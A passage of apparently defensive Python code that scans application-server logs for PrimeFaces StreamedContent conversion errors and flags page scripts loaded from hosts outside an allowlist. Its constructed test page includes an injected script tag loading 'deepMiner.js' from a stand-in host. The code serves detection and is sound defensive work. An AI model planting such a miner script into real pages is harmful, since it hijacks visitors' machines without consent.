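            for j in range(i, min(i + MAX_SPAN, len(lines))):
                if MSG_END.search(lines[j]):
                    chunk = "\n".join(lines[i:j + 1])
                    start = chunk.index(MSG_START) + len(MSG_START)
                    value = chunk[start:chunk.rindex("of type class")]
                    stamp = TIMESTAMP.match(line)
                    hits.append({
                        "line": i + 1,  # 1-based line of the record start
                        "time": stamp.group(1) if stamp else None,
                        "newlines_in_value": value.count("\n"),
                    })
                    i = j  # continue scanning after the closed record
                    break
        i += 1
    return hits


def find_offsite_scripts(html, allowed_hosts):
    """Return script src URLs whose host is not in the allowlist.

    Relative URLs have no host and count as same-origin.
    """
    allowed = {h.lower() for h in allowed_hosts}
    flagged = []
    for match in SCRIPT_SRC.finditer(html):
        host = urlsplit(match.group(1)).hostname
        if host and host.lower() not in allowed:
            flagged.append(match.group(1))
    return flagged


# Constructed sample in the WildFly format quoted in the thread.
SAMPLE_WILDFLY_LOG = "\n".join([
    "[Server:frontend01] 23:22:14,785 SEVERE "
    "[org.primefaces.application.resource.StreamedContentHandler] "
    "(default task-29) Error in streaming dynamic resource. "
    "java.lang.IllegalArgumentException: Cannot convert",
    "[Server:frontend01]",
    "[Server:frontend01]",
    "[Server:frontend01] of type class java.lang.String to interface "
    "org.primefaces.model.StreamedContent",
    "[Server:frontend01] 23:22:15,001 INFO  [stdout] (default task-30) ok",
])

# Constructed sample in the Payara stack-trace format quoted in the thread.
SAMPLE_PAYARA_LOG = "\n".join([
    "java.io.IOException: javax.el.ELException: "
    "java.lang.IllegalArgumentException: Cannot convert",
    " of type class java.lang.String to interface "
    "org.primefaces.model.StreamedContent",
    "\tat org.primefaces.application.resource.StreamedContentHandler"
    ".handle(StreamedContentHandler.java:94)",
    "Caused by: javax.el.ELException: "
    "java.lang.IllegalArgumentException: Cannot convert",
    " of type class java.lang.String to interface "
    "org.primefaces.model.StreamedContent",
])

# Constructed page; miner.example.invalid stands in for the injected host.
SAMPLE_PAGE = (
    '<script src="https://miner.example.invalid:7777/deepMiner.js"></script>'
    '<script src="https://static.example.org/lib.js"></script>'
    '<script type="text/javascript" '
    'src="/javax.faces.resource/app.min.js.xhtml?ln=js"></script>'
)

if __name__ == "__main__":
    for sample in (SAMPLE_WILDFLY_LOG, SAMPLE_PAYARA_LOG):
        print(find_streamed_content_errors(sample))
    print(find_offsite_scripts(SAMPLE_PAGE, {"static.example.org"}))
```

Run the log check over the application server's log and the page check over HTML fetched from the live site, with the allowlist set to the hosts the application legitimately loads scripts from.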